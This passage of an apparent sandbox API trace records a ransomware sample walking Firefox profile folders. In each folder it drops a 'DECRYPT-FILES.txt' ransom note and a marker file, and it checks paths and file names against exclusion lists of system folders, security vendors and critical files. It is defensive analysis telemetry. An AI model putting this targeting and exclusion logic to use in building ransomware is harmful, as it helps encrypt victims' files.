lpString2="dll") returned 1 [0081.131] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0081.131] lstrlenW (lpString=".metadata") returned 9 [0081.131] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0081.131] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0081.131] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0081.132] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x3f2cf88 | out: lpFileSize=0x3f2cf88*=0) returned 1 [0081.132] CreateFileMappingW (hFile=0x470, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0081.133] CloseHandle (hObject=0x0) returned 0 [0081.133] CloseHandle (hObject=0x470) returned 1 [0081.133] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.133] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0081.133] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0081.133] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0081.133] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0081.133] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0081.133] lstrcatW (in: lpString1="idb", lpString2="\\" | out: lpString1="idb\\") returned="idb\\" [0081.133] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Program Files") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch=":\\Windows") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Games\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Tor Browser\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\ProgramData\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\All Users") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\IETldCache\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Local Settings\\") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\AppData\\Local") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="AhnLab") returned 0x0 [0081.133] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0081.133] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0081.134] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.134] wsprintfW (in: param_1=0x3f2d550, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\jkbimi8.tmp") returned 134 [0081.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x470 [0081.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0081.205] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0081.205] wsprintfW (in: param_1=0x3f2d550, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\DECRYPT-FILES.txt") returned 140 [0081.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0081.206] WriteFile (in: hFile=0x474, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d54c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d54c*=0x23fc, lpOverlapped=0x0) returned 1 [0081.207] CloseHandle (hObject=0x474) returned 1 [0081.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0081.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*" [0081.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8e18 [0081.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.207] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.208] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.208] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.208] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0081.208] lstrcmpW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0081.208] lstrcmpW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0081.208] lstrcatW (in: lpString1="818200132aebmoouht", lpString2="\\" | out: lpString1="818200132aebmoouht\\") returned="818200132aebmoouht\\" [0081.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Program Files") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch=":\\Windows") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Games\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Tor Browser\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\ProgramData\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\All Users") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\IETldCache\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Local Settings\\") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\AppData\\Local") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="AhnLab") returned 0x0 [0081.208] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0081.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0081.208] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.208] wsprintfW (in: param_1=0x3f2d2d4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\jkbimi8.tmp") returned 153 [0081.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x478 [0081.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0081.209] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0081.210] wsprintfW (in: param_1=0x3f2d2d4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\DECRYPT-FILES.txt") returned 159 [0081.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0081.210] WriteFile (in: hFile=0x47c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d2d0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d2d0*=0x23fc, lpOverlapped=0x0) returned 1 [0081.211] CloseHandle (hObject=0x47c) returned 1 [0081.211] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0081.211] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*" [0081.212] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x3f2daf4 | out: lpFindFileData=0x3f2daf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8e58 [0081.212] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.212] FindNextFileW (in: hFindFile=0x5f8e58, lpFindFileData=0x3f2daf4 | out: lpFindFileData=0x3f2daf4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.212] FindNextFileW (in: hFindFile=0x5f8e58, lpFindFileData=0x3f2daf4 | out: lpFindFileData=0x3f2daf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac9b00a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0081.212] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0081.212] FindNextFileW (in: hFindFile=0x5f8e58, lpFindFileData=0x3f2daf4 | out: lpFindFileData=0x3f2daf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.212] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.212] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.212] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.212] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.212] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.212] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0081.212] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.212] lstrcpyW (in: lpString1=0x3f2d2c4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" [0081.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\jkbimi8.tmp" [0081.212] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.213] CreateFileW 